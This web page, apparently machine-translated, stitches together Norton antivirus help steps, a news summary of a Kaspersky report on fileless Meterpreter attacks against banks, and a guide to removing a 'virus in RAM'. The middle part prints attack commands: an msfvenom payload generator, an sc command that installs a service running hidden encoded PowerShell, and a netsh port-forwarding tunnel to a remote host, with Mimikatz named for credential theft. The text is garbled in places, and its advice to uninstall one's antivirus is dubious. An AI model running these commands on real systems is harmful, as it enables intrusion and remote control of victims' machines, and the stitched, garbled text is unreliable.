When Norton detects a threat, the program automatically removes it, unless your intervention is necessary to determine how to handle the threat. In such cases, Norton displays a "Threats Detected" or "Security Threat" notification with options available to respond to the threat.
View threats that were automatically removed during scanning
Launch Norton.
Device Security, click Open.
In the window Security log Security Threats Resolved.
Select a threat from the list and view the actions taken in the Details pane.
In some cases, instead of automatically resolving a threat, Norton recommends that you take a specific action to resolve it.
Fixing threats that were not eliminated during scanning
Launch Norton.
If the My Norton window appears next to the section Device Security, click Open.
In the main Norton window, double-click Security and then select Log.
In the window Security log in the Show list, select Unresolved security threats.
If the list contains unresolved threats, select the threat you are interested in.
If you have reason to believe that your system is infected, run Norton Power Eraser. Norton Power Eraser is a powerful malware removal tool that gets rid of the most resistant security threats. Additional information see Run Norton Threat Scan on PC
Norton Power Eraser is an aggressive malware removal tool. Sometimes along with malware Norton Power Eraser may remove legitimate files, so review the scan results carefully before deleting any files.
By default, Norton removes security threats from your computer and quarantines them. If you have reason to believe that a file was deleted by mistake, you can restore it from quarantine to its original location and exclude it from subsequent scans.
Restoring a file from quarantine
Launch Norton.
If the My Norton window appears next to the section Device Security, click Open.
In the main Norton window, click Security and then select Log.
In the window Security log Expand the Show menu and select the Quarantine option.
Select the file you want to restore.
In the Details pane, click Options.
In the window Threat detected select team Recover and exclude this file.
In the window Recovery from quarantine Click Yes button.
In the Browse for Folder window, select a folder or drive to place the recovered file and click OK.
about a new, interesting malicious campaign that affected banks, telecoms, government agencies, as well as other companies and organizations in more than forty countries around the world.
Analysts from the GReAT team write that the bank security team was the first to notice the threat: then in physical memory domain controller Meterpreter code was found. Kaspersky Lab products recognize problems such as MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. As analysts dug into trying to figure out where the code in memory came from, they also discovered PowerShell scripts in Windows registry, and the NETSH utility, which was used to tunnel traffic to the attackers’ control server.
Such attacks are called “fileless”, that is, the malware does not place any files on the hard drive; instead, the payload is injected directly into memory and exists inside RAM. Of course, such an attack is extremely difficult to detect and track.
Attack pattern
The researchers explain that the well-known Metasploit framework can be used to create scripts like the example below.
Such scripts help to inject Meterpreter into RAM. Msfvenom from Metasploit can be used to generate them:
Msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd
Once the script is generated, the attackers use Windows SC to install a malicious service on the target host (which will ultimately execute the above script). This can be done, for example, using the following command:
sc \\target_name create ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA...” start= manual
The next step is to configure tunneling so that the infected machine becomes accessible to the remote host. To do this, attackers resort to the following command:
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0
As a result, all network traffic from 10.10.1.11:4444 will be redirected to 10.10.1.12:8080. This technique allows you to install a proxy tunnel, with the help of which criminals can remotely control a host infected with PowerShell.
Analysts note that using SC and NETSH requires administrator privileges on the local and remote host. Using malicious PowerShell scripts will also require escalation of privileges and changes to the execution policy. To do this, attackers resort to using the Mimikatz credential dumper, collecting passwords from accounts on the local machine and surrounding workstations.
Having carefully studied the attack on one of the affected banks, the researchers came to the conclusion that the operators of this campaign used third-level domains, as well as domains in the .GA, .ML, .CF zones. The fact is that such domains are free, which means that attackers do not leave behind WHOIS information.
Summarizing all of the above (using Metasploit and standard Windows utilities, domains without WHOIS information), researchers conclude that the handwriting of the unknown attackers is very similar to the work of groups such as GCMAN and Carbanak. However, there is no direct evidence, so it is not possible to link these silent attacks to any specific group.
“Techniques like those described in this report are becoming increasingly common, especially [when attacks are carried out] against large targets in the banking industry. Unfortunately, the use of simple tools, combined with various tricks, makes detecting [such attacks] extremely difficult,” summarize GReAT experts.
Virus in random access memory, this phenomenon is quite unpleasant and, unfortunately, not uncommon. very often we see a hidden file but cannot delete it in any way - it keeps appearing and appearing, or the operating system itself Windows system doesn't let me do it.
By the way, it manifests itself much more often in cases incorrect setting antivirus or lack thereof. If you have such a situation, I recommend that you read the article - installing and configuring an antivirus on Windows. Before you remove a virus from RAM, it is worth understanding what is happening with the antivirus program installed on your computer. Most likely, your antivirus program was “ruined” by an emerging virus. It is also possible that in the signature arsenal of your antivirus program there is no method to completely erase the virus from a timely collection and the program only attempts to remove the viral infection, and not the virus itself .
Situations often occur when a virus transfers programs and additional files for its own work, or automatically starts working, but now the anti-virus program will detect these copies, but will not detect the source code (virus) itself, and in most cases cannot cope with it.
- We remove (using the uninstaller - add/remove programs) the installed antivirus program, it is of no use here.
- Download CCleaner from the Internet and install it. Let's get started, first clear the temp folders. This software is suitable ordinary users, based on this it is possible to check all the checkboxes in settings - custom it will not erase data! I wrote more about the program in the article - cleaning the registry.
- Then we will need a virus cleaning utility to help us. I wrote about them in the article - free utilities to remove viruses. We choose any one. For example, download the Dr.web Cure it program from the Internet and install it.
- Install the update and run one of two scans (quick or full). Rapid scanning gives, in principle, an effective result. We remove all viruses that were detected. Reboot the computer.
- Download a new antivirus. Fundamentally important! If before the trouble, you had the antivirus Eset NOD32 antivirus installed, then install Avast or Avira; if Avast was installed, install Eset, or any other antivirus program of your choice.
- It is quite easy to interpret such actions, the antivirus program that you had was most likely damaged, the data in the registry could remain, and this will lead to inaccurate operation of the antivirus program, especially since this particular antivirus program did not find a threat from the Internet on on your computer.